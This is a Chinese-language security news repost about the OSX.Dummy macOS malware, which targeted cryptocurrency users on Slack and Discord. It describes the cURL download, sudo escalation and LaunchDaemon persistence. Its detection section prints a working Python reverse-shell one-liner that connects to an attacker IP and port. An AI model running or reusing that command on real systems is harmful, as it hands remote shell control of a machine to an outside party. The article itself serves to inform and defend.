返回IT运维网
  • |
  • 文章EID:
  • |
  • 账号:
  • 密码:
MacOS出现新型OSX.Dummy恶意软件
2018-07-04 IT运维网 / 转载

      近期,MacOS上又传播一种新型的恶意软件,被称为OSX.Dummy。攻击者通过欺骗和引导用户下载和执行恶意二进制文件,如果文件被执行,并且恶意软件能够连接到对手的C2服务器(命令控制服务器),攻击者就可以控制目标系统。 使用MacOS恶意软件的黑客瞄准使用Slack和Discord聊天平台的加密货币投资者。被称为OSX.Dummy的恶意软件使用了一种不太复杂的感染方法,但是也有许多用户被感染,并在受害电脑上远程执行任意代码。

恶意软件OSX.Dummy简介

      研究人员Remco Verhoef首先发现并描述了恶意软件,并向SANS InfoSec Handlers Diary Blog发布了他的发现。研究人员说,他上周观察到多次攻击。
通过假冒来自加密相关的Slack或Discord聊天组的管理员或关键人物。分享恶意代码,导致下载和执行恶意二进制文件 。

      Wardle指出,这个二进制文件没有签名,并补充说,恶意软件能够避开macOS Gatekeeper安全软件。

“通常,这样的二进制文件将被网关阻止。但是,如果用户 通过终端命令直接 下载并运行二进制文件  ,网关不会发挥作用,因此无符号二进制文件将被允许执行,内置的macOS恶意软件缓解将不再起作用。”
      被称为恶意软件OSX.Dummy,因为用于转储受害者密码的目录之一被称为“/ tmp / dumpdummy”。

恶意软件攻击原理分析

      攻击者会诱使用户执行脚本,然后通过cURL下载重要的34Mb OSX.Dummy恶意软件。下载文件保存在macOS / tmp / script目录下,然后执行。
“该文件是一个大型的mach064二进制文件(34M),在VirusTotal上评分为0/60,”

      该脚本欺骗受害者下载OSX.Dummy。

      当执行恶意软件二进制文件时,macOS sudo命令(通过终端)将恶意软件的权限更改为root。“他要求用户在终端上输入他们的密码,”根据Apple的说法,“要在Mac上的终端中执行sudo命令,您必须使用具有密码的管理员帐户登录。” 成功安装以后,恶意软件会丢弃各种macOS目录中的代码,包括“/Library/LaunchDaemons/com.startup.plist”,它提供了OSX.Dummy持久性。
 
      Wardle指出,如果攻击成功,并且恶意软件能够连接到对手的C2服务器,攻击者就可以控制目标系统。

最后 检测及防范方法

      今天我们分析了一个新的mac恶意软件。我称之为OSX.Dummy为:
  • 感染方法很愚蠢
  • 二进制的巨大规模是愚蠢的
  • 持久性机制是蹩脚的(因此也是愚蠢的)
  • 能力相当有限(因而相当愚蠢)
  • 在每一步(愚蠢)检测都是微不足道的
  • ...最后,恶意软件将用户的密码保存到 dumpdummy

      要检查您是否被感染,请以root身份运行KnockKnock(因为恶意软件集的组件只能由root读取)。查找 com.startup.plist 执行名为'script.sh' 的未签名启动项:

      还可以查找以root身份运行的python运行实例,并使用上述反向shell命令:

$ ps aux | grep -i python
root python -c import socket,subprocess,os; 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); 
s.connect(("185.243.115.230",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);

转自:安全加

相关评论 [查看所有评论]
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
心情:
  • 支持
  • 高兴
  • 枪稿
  • 不解
  • 搞笑
  • 愤怒
  • 谎言
账号: 密码:
验证码 看不清?点击更换
相关阅读